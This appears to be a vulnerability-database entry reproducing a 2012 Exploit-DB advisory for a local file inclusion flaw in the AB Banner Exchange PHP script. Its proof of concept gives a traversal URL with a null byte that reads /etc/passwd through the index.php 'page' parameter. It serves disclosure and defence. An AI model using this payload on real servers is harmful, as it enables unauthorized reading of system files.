AB Banner Exchange (index.php page) Local file inclusion

vendor:

AB Banner Exchange

by:

Yakir Wizman

7,5

CVSS

HIGH

Local file inclusion

CWE

Product Name: AB Banner Exchange

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

AB Banner Exchange (index.php page) Local file inclusion

Local file inclusion vulnerability in AB Banner Exchange, a PHP script for running a banner exchange system, allows an attacker to read arbitrary files on the server via a crafted URL.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.

Source

Exploit-DB raw data:

-----------------------------------------------------------
AB Banner Exchange (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.abscripts.com/ab-banner-exchange/
Demo - http://www.scripts-demo.com/ab-banner-exchange/
ISRAEL
-----------------------------------------------------------
       Author will be not responsible for any damage.
-----------------------------------------------------------

About the Application
-----------------------------------------------------------
AB Banner Exchange is an advanced PHP script for running your own banner exchange system.


Proof Of Conecpt
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL	: http://server/ab-banner-exchange/index.php?page=../../../../../../../../../../etc/passwd%00